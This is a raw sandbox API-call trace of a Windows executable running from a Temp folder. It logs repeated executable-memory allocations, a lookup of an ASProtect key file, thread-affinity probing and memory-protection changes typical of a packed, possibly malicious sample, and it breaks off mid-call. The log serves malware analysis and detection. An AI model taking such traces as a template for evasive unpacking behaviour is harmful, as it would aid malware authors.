GetCurrentProcessId () returned 0xeb4 [0134.573] GetCurrentProcessId () returned 0xeb4 [0134.573] GetCurrentProcessId () returned 0xeb4 [0134.573] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x35c0000 [0134.574] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.575] GetCurrentProcessId () returned 0xeb4 [0134.575] GetCurrentProcessId () returned 0xeb4 [0134.575] GetCurrentProcessId () returned 0xeb4 [0134.575] GetCurrentProcessId () returned 0xeb4 [0134.575] GetCurrentProcessId () returned 0xeb4 [0134.575] GetCurrentProcessId () returned 0xeb4 [0134.575] GetCurrentProcessId () returned 0xeb4 [0134.575] GetCurrentProcessId () returned 0xeb4 [0134.575] GetCurrentProcessId () returned 0xeb4 [0134.575] GetCurrentProcessId () returned 0xeb4 [0134.575] GetCurrentProcessId () returned 0xeb4 [0134.575] GetCurrentProcessId () returned 0xeb4 [0134.575] GetCurrentProcessId () returned 0xeb4 [0134.575] GetCurrentProcessId () returned 0xeb4 [0134.575] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x35c0000 [0134.576] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.577] GetCurrentProcessId () returned 0xeb4 [0134.577] GetCurrentProcessId () returned 0xeb4 [0134.577] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.578] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] GetCurrentProcessId () returned 0xeb4 [0134.579] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x35c0000 [0134.580] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.581] GetCurrentProcessId () returned 0xeb4 [0134.581] GetCurrentProcessId () returned 0xeb4 [0134.581] GetCurrentProcessId () returned 0xeb4 [0134.581] GetCurrentProcessId () returned 0xeb4 [0134.581] GetCurrentProcessId () returned 0xeb4 [0134.581] GetCurrentProcessId () returned 0xeb4 [0134.581] GetCurrentProcessId () returned 0xeb4 [0134.581] GetCurrentProcessId () returned 0xeb4 [0134.582] GetCurrentProcessId () returned 0xeb4 [0134.582] GetCurrentProcessId () returned 0xeb4 [0134.582] GetCurrentProcessId () returned 0xeb4 [0134.582] GetCurrentProcessId () returned 0xeb4 [0134.582] GetCurrentProcessId () returned 0xeb4 [0134.582] GetCurrentProcessId () returned 0xeb4 [0134.582] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x35c0000 [0134.583] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.584] GetCurrentProcessId () returned 0xeb4 [0134.584] GetCurrentProcessId () returned 0xeb4 [0134.584] GetCurrentProcessId () returned 0xeb4 [0134.584] GetCurrentProcessId () returned 0xeb4 [0134.584] GetCurrentProcessId () returned 0xeb4 [0134.584] GetCurrentProcessId () returned 0xeb4 [0134.584] GetCurrentProcessId () returned 0xeb4 [0134.584] GetCurrentProcessId () returned 0xeb4 [0134.584] GetCurrentProcessId () returned 0xeb4 [0134.584] GetCurrentProcessId () returned 0xeb4 [0134.584] GetCurrentProcessId () returned 0xeb4 [0134.584] GetCurrentProcessId () returned 0xeb4 [0134.584] GetCurrentProcessId () returned 0xeb4 [0134.584] GetCurrentProcessId () returned 0xeb4 [0134.584] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x35c0000 [0134.585] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.586] GetCurrentProcessId () returned 0xeb4 [0134.586] GetCurrentProcessId () returned 0xeb4 [0134.586] GetCurrentProcessId () returned 0xeb4 [0134.586] GetCurrentProcessId () returned 0xeb4 [0134.586] GetCurrentProcessId () returned 0xeb4 [0134.586] GetCurrentProcessId () returned 0xeb4 [0134.586] GetCurrentProcessId () returned 0xeb4 [0134.586] GetCurrentProcessId () returned 0xeb4 [0134.586] GetCurrentProcessId () returned 0xeb4 [0134.587] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.588] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.628] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.629] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.635] GetSystemTime (in: lpSystemTime=0x18fef4 | out: lpSystemTime=0x18fef4*(wYear=0x7e5, wMonth=0xc, wDayOfWeek=0x1, wDay=0x1b, wHour=0x16, wMinute=0xa, wSecond=0x17, wMilliseconds=0x1fd)) [0134.636] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.637] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.637] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.638] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.639] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.640] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.640] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.655] ExpandEnvironmentStringsA (in: lpSrc="aspr_keys.ini", lpDst=0x18f6a8, nSize=0x400 | out: lpDst="aspr_keys.ini") returned 0xe [0134.656] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f9a8, nSize=0xff | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\663A.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\663a.exe")) returned 0x2d [0134.656] FindFirstFileA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\aspr_keys.ini", lpFindFileData=0x18f954 | out: lpFindFileData=0x18f954*(dwFileAttributes=0x2132128, ftCreationTime.dwLowDateTime=0x18fab0, ftCreationTime.dwHighDateTime=0x213214c, ftLastAccessTime.dwLowDateTime=0x2132153, ftLastAccessTime.dwHighDateTime=0x2d, ftLastWriteTime.dwLowDateTime=0x18f9a8, ftLastWriteTime.dwHighDateTime=0x18fac8, nFileSizeHigh=0x250000, nFileSizeLow=0x22192ec, dwReserved0=0x18fed8, dwReserved1=0x21325a2, cFileName="ô\x92!\x02¨ù\x18", cAlternateFileName="0\x93!\x022")) returned 0xffffffff [0134.657] GetTempPathA (in: nBufferLength=0x3ff, lpBuffer=0x18fad0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0134.657] FindFirstFileA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\aspr_keys.ini", lpFindFileData=0x18f954 | out: lpFindFileData=0x18f954*(dwFileAttributes=0x250000, ftCreationTime.dwLowDateTime=0x20000000, ftCreationTime.dwHighDateTime=0x267df8, ftLastAccessTime.dwLowDateTime=0x18fa50, ftLastAccessTime.dwHighDateTime=0x77a1389e, ftLastWriteTime.dwLowDateTime=0x250138, ftLastWriteTime.dwHighDateTime=0x77a1387a, nFileSizeHigh=0x7662bdaa, nFileSizeLow=0x0, dwReserved0=0x250000, dwReserved1=0x267e00, cFileName="¼", cAlternateFileName="\x8cú\x18")) returned 0xffffffff [0134.657] GetCurrentProcessId () returned 0xeb4 [0134.657] GetCurrentProcessId () returned 0xeb4 [0134.658] GetCurrentProcessId () returned 0xeb4 [0134.659] GetCurrentProcessId () returned 0xeb4 [0134.665] GetCurrentProcessId () returned 0xeb4 [0134.665] GetCurrentProcessId () returned 0xeb4 [0134.665] GetCurrentProcessId () returned 0xeb4 [0134.665] GetCurrentProcessId () returned 0xeb4 [0134.672] GetCurrentProcessId () returned 0xeb4 [0134.672] GetCurrentProcessId () returned 0xeb4 [0134.672] GetCurrentProcessId () returned 0xeb4 [0134.672] GetCurrentProcessId () returned 0xeb4 [0134.672] GetCurrentProcessId () returned 0xeb4 [0134.672] GetCurrentProcessId () returned 0xeb4 [0134.672] GetCurrentProcessId () returned 0xeb4 [0134.673] GetCurrentProcessId () returned 0xeb4 [0134.673] GetCurrentProcessId () returned 0xeb4 [0134.673] GetCurrentProcessId () returned 0xeb4 [0134.673] GetCurrentProcessId () returned 0xeb4 [0134.677] GetCurrentProcessId () returned 0xeb4 [0134.677] GetCurrentProcessId () returned 0xeb4 [0134.677] GetCurrentProcessId () returned 0xeb4 [0134.677] GetCurrentProcessId () returned 0xeb4 [0134.677] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x35c0000 [0134.681] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.682] GetCurrentProcessId () returned 0xeb4 [0134.682] GetCurrentProcessId () returned 0xeb4 [0134.682] GetCurrentProcessId () returned 0xeb4 [0134.683] GetCurrentProcessId () returned 0xeb4 [0134.683] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x35c0000 [0134.685] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] GetCurrentProcessId () returned 0xeb4 [0134.687] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x35c0000 [0134.689] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.690] GetCurrentProcessId () returned 0xeb4 [0134.690] GetCurrentProcessId () returned 0xeb4 [0134.690] GetCurrentProcessId () returned 0xeb4 [0134.690] GetCurrentProcessId () returned 0xeb4 [0134.690] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x35c0000 [0134.691] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.692] GetCurrentProcessId () returned 0xeb4 [0134.692] GetCurrentProcessId () returned 0xeb4 [0134.692] GetCurrentProcessId () returned 0xeb4 [0134.692] GetCurrentProcessId () returned 0xeb4 [0134.692] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x35c0000 [0134.693] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.694] GetCurrentProcessId () returned 0xeb4 [0134.694] GetCurrentProcessId () returned 0xeb4 [0134.694] GetCurrentProcessId () returned 0xeb4 [0134.694] GetCurrentProcessId () returned 0xeb4 [0134.694] GetCurrentProcessId () returned 0xeb4 [0134.694] GetCurrentProcessId () returned 0xeb4 [0134.694] GetCurrentProcessId () returned 0xeb4 [0134.694] GetCurrentProcessId () returned 0xeb4 [0134.694] GetCurrentProcessId () returned 0xeb4 [0134.694] GetCurrentProcessId () returned 0xeb4 [0134.694] GetCurrentProcessId () returned 0xeb4 [0134.694] VirtualFree (lpAddress=0x20f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.696] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.698] VirtualFree (lpAddress=0x27e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.700] VirtualFree (lpAddress=0x2890000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.702] VirtualFree (lpAddress=0x2940000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.704] GetCurrentProcessId () returned 0xeb4 [0134.704] GetCurrentProcessId () returned 0xeb4 [0134.704] GetCurrentProcessId () returned 0xeb4 [0134.704] GetCurrentProcessId () returned 0xeb4 [0134.704] GetCurrentProcessId () returned 0xeb4 [0134.704] GetCurrentProcessId () returned 0xeb4 [0134.704] GetCurrentProcessId () returned 0xeb4 [0134.704] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.705] GetCurrentProcessId () returned 0xeb4 [0134.706] GetCurrentProcessId () returned 0xeb4 [0134.706] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x20f0000 [0134.707] VirtualFree (lpAddress=0x20f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.708] GetCurrentProcessId () returned 0xeb4 [0134.708] GetCurrentProcessId () returned 0xeb4 [0134.708] GetCurrentProcessId () returned 0xeb4 [0134.708] GetCurrentProcessId () returned 0xeb4 [0134.708] GetCurrentProcessId () returned 0xeb4 [0134.708] GetCurrentProcessId () returned 0xeb4 [0134.708] GetCurrentProcessId () returned 0xeb4 [0134.708] GetCurrentProcessId () returned 0xeb4 [0134.708] GetCurrentProcessId () returned 0xeb4 [0134.708] GetCurrentProcessId () returned 0xeb4 [0134.708] GetCurrentProcessId () returned 0xeb4 [0134.708] GetCurrentProcessId () returned 0xeb4 [0134.708] GetCurrentProcessId () returned 0xeb4 [0134.708] GetCurrentProcessId () returned 0xeb4 [0134.708] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x20f0000 [0134.709] VirtualFree (lpAddress=0x20f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.710] GetCurrentProcessId () returned 0xeb4 [0134.710] GetCurrentProcessId () returned 0xeb4 [0134.710] GetCurrentProcessId () returned 0xeb4 [0134.710] GetCurrentProcessId () returned 0xeb4 [0134.710] GetCurrentProcessId () returned 0xeb4 [0134.710] GetCurrentProcessId () returned 0xeb4 [0134.710] GetCurrentProcessId () returned 0xeb4 [0134.710] GetCurrentProcessId () returned 0xeb4 [0134.710] GetCurrentProcessId () returned 0xeb4 [0134.710] GetCurrentProcessId () returned 0xeb4 [0134.710] GetCurrentProcessId () returned 0xeb4 [0134.710] GetCurrentProcessId () returned 0xeb4 [0134.710] GetCurrentProcessId () returned 0xeb4 [0134.710] GetCurrentProcessId () returned 0xeb4 [0134.711] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x20f0000 [0134.711] VirtualFree (lpAddress=0x20f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.712] GetCurrentProcessId () returned 0xeb4 [0134.712] GetCurrentProcessId () returned 0xeb4 [0134.712] GetCurrentProcessId () returned 0xeb4 [0134.712] GetCurrentProcessId () returned 0xeb4 [0134.712] GetCurrentProcessId () returned 0xeb4 [0134.712] GetCurrentProcessId () returned 0xeb4 [0134.712] GetCurrentProcessId () returned 0xeb4 [0134.712] GetCurrentProcessId () returned 0xeb4 [0134.712] GetCurrentProcessId () returned 0xeb4 [0134.712] GetCurrentProcessId () returned 0xeb4 [0134.713] GetCurrentProcessId () returned 0xeb4 [0134.713] GetCurrentProcessId () returned 0xeb4 [0134.713] GetCurrentProcessId () returned 0xeb4 [0134.713] GetCurrentProcessId () returned 0xeb4 [0134.713] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x20f0000 [0134.713] VirtualFree (lpAddress=0x20f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.714] GetCurrentProcessId () returned 0xeb4 [0134.715] GetCurrentProcessId () returned 0xeb4 [0134.715] GetCurrentProcessId () returned 0xeb4 [0134.715] GetCurrentProcessId () returned 0xeb4 [0134.715] GetCurrentProcessId () returned 0xeb4 [0134.715] GetCurrentProcessId () returned 0xeb4 [0134.715] GetCurrentProcessId () returned 0xeb4 [0134.715] GetCurrentProcessId () returned 0xeb4 [0134.715] GetCurrentProcessId () returned 0xeb4 [0134.715] GetCurrentProcessId () returned 0xeb4 [0134.716] GetCurrentProcessId () returned 0xeb4 [0134.716] GetCurrentProcessId () returned 0xeb4 [0134.716] GetCurrentProcessId () returned 0xeb4 [0134.716] GetCurrentProcessId () returned 0xeb4 [0134.716] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x20f0000 [0134.717] VirtualFree (lpAddress=0x20f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.718] GetCurrentProcessId () returned 0xeb4 [0134.718] GetCurrentProcessId () returned 0xeb4 [0134.718] GetCurrentProcessId () returned 0xeb4 [0134.718] GetCurrentProcessId () returned 0xeb4 [0134.718] GetCurrentProcessId () returned 0xeb4 [0134.718] GetCurrentProcessId () returned 0xeb4 [0134.718] GetCurrentProcessId () returned 0xeb4 [0134.718] GetCurrentProcessId () returned 0xeb4 [0134.718] GetCurrentProcessId () returned 0xeb4 [0134.718] GetCurrentProcessId () returned 0xeb4 [0134.718] GetCurrentProcessId () returned 0xeb4 [0134.718] GetCurrentProcessId () returned 0xeb4 [0134.718] GetCurrentProcessId () returned 0xeb4 [0134.719] GetCurrentProcessId () returned 0xeb4 [0134.719] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x20f0000 [0134.719] VirtualFree (lpAddress=0x20f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.720] GetCurrentProcessId () returned 0xeb4 [0134.720] GetCurrentProcessId () returned 0xeb4 [0134.720] GetCurrentProcessId () returned 0xeb4 [0134.720] GetCurrentProcessId () returned 0xeb4 [0134.720] GetCurrentProcessId () returned 0xeb4 [0134.720] GetCurrentProcessId () returned 0xeb4 [0134.720] GetCurrentProcessId () returned 0xeb4 [0134.720] GetCurrentProcessId () returned 0xeb4 [0134.721] GetCurrentProcessId () returned 0xeb4 [0134.721] GetCurrentProcessId () returned 0xeb4 [0134.721] GetCurrentProcessId () returned 0xeb4 [0134.721] GetCurrentProcessId () returned 0xeb4 [0134.721] GetCurrentProcessId () returned 0xeb4 [0134.721] GetCurrentProcessId () returned 0xeb4 [0134.721] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x20f0000 [0134.721] VirtualFree (lpAddress=0x20f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.722] GetCurrentProcessId () returned 0xeb4 [0134.722] GetCurrentProcessId () returned 0xeb4 [0134.722] GetCurrentProcessId () returned 0xeb4 [0134.723] GetCurrentProcessId () returned 0xeb4 [0134.723] GetCurrentProcessId () returned 0xeb4 [0134.723] GetCurrentProcessId () returned 0xeb4 [0134.723] GetCurrentProcessId () returned 0xeb4 [0134.723] GetCurrentProcessId () returned 0xeb4 [0134.723] GetCurrentProcessId () returned 0xeb4 [0134.723] GetCurrentProcessId () returned 0xeb4 [0134.723] GetCurrentProcessId () returned 0xeb4 [0134.723] GetCurrentProcessId () returned 0xeb4 [0134.723] GetCurrentProcessId () returned 0xeb4 [0134.723] GetCurrentProcessId () returned 0xeb4 [0134.723] GetCurrentProcessId () returned 0xeb4 [0134.723] GetCurrentProcessId () returned 0xeb4 [0134.723] GetCurrentProcessId () returned 0xeb4 [0134.723] GetCurrentProcessId () returned 0xeb4 [0134.723] GetCurrentProcessId () returned 0xeb4 [0134.723] GetCurrentProcessId () returned 0xeb4 [0134.723] GetCurrentProcessId () returned 0xeb4 [0134.726] GetCurrentProcessId () returned 0xeb4 [0134.729] GetCurrentProcessId () returned 0xeb4 [0134.731] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x20f0000 [0134.733] VirtualFree (lpAddress=0x20f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.734] GetCurrentProcessId () returned 0xeb4 [0134.734] GetCurrentProcessId () returned 0xeb4 [0134.734] GetCurrentProcessId () returned 0xeb4 [0134.734] GetCurrentProcessId () returned 0xeb4 [0134.734] GetCurrentProcessId () returned 0xeb4 [0134.734] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x20f0000 [0134.736] VirtualFree (lpAddress=0x20f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.737] GetCurrentProcessId () returned 0xeb4 [0134.737] GetCurrentProcessId () returned 0xeb4 [0134.737] GetCurrentProcessId () returned 0xeb4 [0134.737] GetCurrentProcessId () returned 0xeb4 [0134.737] GetCurrentProcessId () returned 0xeb4 [0134.737] GetCurrentProcessId () returned 0xeb4 [0134.738] GetCurrentProcessId () returned 0xeb4 [0134.738] GetCurrentProcessId () returned 0xeb4 [0134.738] GetCurrentProcessId () returned 0xeb4 [0134.738] GetCurrentProcessId () returned 0xeb4 [0134.738] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x20f0000 [0134.739] GetCurrentProcessId () returned 0xeb4 [0134.739] GetCurrentProcessId () returned 0xeb4 [0134.739] GetCurrentProcessId () returned 0xeb4 [0134.739] GetCurrentProcessId () returned 0xeb4 [0134.739] GetCurrentProcessId () returned 0xeb4 [0134.739] GetCurrentProcessId () returned 0xeb4 [0134.739] GetCurrentProcessId () returned 0xeb4 [0134.739] GetCurrentProcessId () returned 0xeb4 [0134.739] GetCurrentProcessId () returned 0xeb4 [0134.739] GetCurrentProcessId () returned 0xeb4 [0134.739] GetCurrentProcessId () returned 0xeb4 [0134.739] GetCurrentProcessId () returned 0xeb4 [0134.739] GetCurrentProcessId () returned 0xeb4 [0134.739] GetCurrentProcessId () returned 0xeb4 [0134.739] GetCurrentProcessId () returned 0xeb4 [0134.739] GetCurrentProcessId () returned 0xeb4 [0134.739] GetCurrentProcessId () returned 0xeb4 [0134.740] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.741] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.742] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.743] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.744] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.745] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.745] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.235] LocalFree (hMem=0x267eb8) returned 0x0 [0135.235] GetProcessAffinityMask (in: hProcess=0xffffffff, lpProcessAffinityMask=0x18fea8, lpSystemAffinityMask=0x18fee0 | out: lpProcessAffinityMask=0x18fea8, lpSystemAffinityMask=0x18fee0) returned 1 [0135.582] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x1) returned 0x1 [0135.583] Sleep (dwMilliseconds=0x0) [0135.636] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x1) returned 0x1 [0135.636] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x2) returned 0x0 [0135.636] Sleep (dwMilliseconds=0x0) [0135.670] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x0) returned 0x0 [0135.670] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x4) returned 0x0 [0135.671] Sleep (dwMilliseconds=0x0) [0135.671] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x0) returned 0x0 [0135.671] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x8) returned 0x0 [0135.671] Sleep (dwMilliseconds=0x0) [0135.672] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x0) returned 0x0 [0135.673] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18fabc*=0x435000, NumberOfBytesToProtect=0x18fab4, NewAccessProtection=0x20, OldAccessProtection=0x18fdfc | out: BaseAddress=0x18fabc*=0x435000, NumberOfBytesToProtect=0x18fab4, OldAccessProtection=0x18fdfc*=0x40) returned 0x0 [0135.679] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18fabc*=0x424000, NumberOfBytesToProtect=0x18fab4, NewAccessProtection=0x2, OldAccessProtection=0x18fdfc | out: 